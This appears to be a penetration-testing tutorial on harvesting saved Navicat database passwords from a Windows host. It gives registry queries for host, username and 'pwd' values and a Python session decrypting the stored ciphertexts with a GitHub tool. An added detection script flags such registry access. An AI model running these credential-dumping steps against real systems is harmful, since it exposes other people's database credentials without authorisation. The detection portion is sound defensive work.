
Information Gathering: Navicat Passwords

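Navicat supports many databases: MySQL, MariaDB, Oracle, SQLite, PostgreSQL and Microsoft SQL Server.
Administrators usually have Navicat remember their passwords, so when you come across a server, being able to recover the plaintext passwords is of course a good thing.
The method is as follows: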

Registry:

reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName

More registry locations, by database type:

MySQL          HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDB        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
Microsoft SQL  HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
Oracle         HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQL     HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLite         HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\
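
On the monitoring side, the queries and key paths above are easy to spot in process-creation logs that record the command line. The following is an added example, not part of the original post or of the GitHub project referenced below; the function names and the sample command lines are constructed for illustration.

```python
import re

# Key names under HKCU\Software\PremiumSoft, as listed on this page.
PRODUCT_KEYS = {
    "navicat": "MySQL", "navicatmariadb": "MariaDB",
    "navicatmssql": "Microsoft SQL Server", "navicatora": "Oracle",
    "navicatpg": "PostgreSQL", "navicatsqlite": "SQLite",
}

# Matches reg.exe style (HKCU\...) and PowerShell drive style (HKCU:\...),
# plus per-user hives reached through HKEY_USERS\<SID>.
KEY_RE = re.compile(
    r"(?:HKEY_CURRENT_USER|HKCU|HKEY_USERS\\[^\\\s]+|HKU\\[^\\\s]+):?\\+"
    r"SOFTWARE\\+PremiumSoft\\+(Navicat\w*)\\+Servers",
    re.IGNORECASE,
)
VALUE_RE = re.compile(r'/v\s+"?(\w+)', re.IGNORECASE)

def classify(command_line):
    """Return None for unrelated commands, else details of the key access."""
    m = KEY_RE.search(command_line)
    if not m:
        return None
    product = PRODUCT_KEYS.get(m.group(1).lower(), "unknown Navicat product")
    v = VALUE_RE.search(command_line)
    value = v.group(1).lower() if v else None
    # Reading "pwd", or dumping the key with no /v filter, exposes the
    # stored (encrypted) password; host/UserName alone is lower severity.
    severity = "high" if value in (None, "pwd") else "medium"
    return {"product": product, "value": value, "severity": severity}

def scan(command_lines):
    """Return (command_line, details) for every line touching a Servers key."""
    return [(c, info) for c in command_lines if (info := classify(c))]

# Constructed sample command lines (not real log data).
SAMPLES = [
    r'reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd',
    r'reg  query hkcu\software\premiumsoft\NavicatPG\Servers /s /v host',
    r'powershell -c "Get-ItemProperty HKCU:\Software\PremiumSoft\NavicatMSSQL\Servers\*"',
    r'reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run',
]

if __name__ == "__main__":
    for cmd, info in scan(SAMPLES):
        print(f"[{info['severity']}] {info['product']}: {cmd}")
```

Navicat itself reads these keys, so alert on processes other than the Navicat executable touching them.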

Recovering the plaintext password:
Navicat 11 and Navicat 12 use different encryption algorithms.
Both can be decrypted with: https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password

Usage:

pip install blowfish
pip install pypiwin32

PS E:\GitHub\how-does-navicat-encrypt-password\python3> python
Python 3.6.3 (v3.6.3:2c5fed8, Oct 3 2017, 18:11:49) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> from NavicatCrypto import *
>>> cipher = Navicat11Crypto()
>>> cipher.EncryptString('This is a test')
'0EA71F51DD37BFB60CCBA219BE3A'
>>> cipher.DecryptString('0EA71F51DD37BFB60CCBA219BE3A')
'This is a test'
>>> cipher2 = Navicat12Crypto()
>>> cipher2.EncryptStringForNCX('This is a test')
'B75D320B6211468D63EB3B67C9E85933'
>>> cipher2.DecryptStringForNCX('B75D320B6211468D63EB3B67C9E85933')
'This is a test'
>>>

For details, see: https://github.com/DoubleLabyrinth/how-does-navicat-encrypt-password
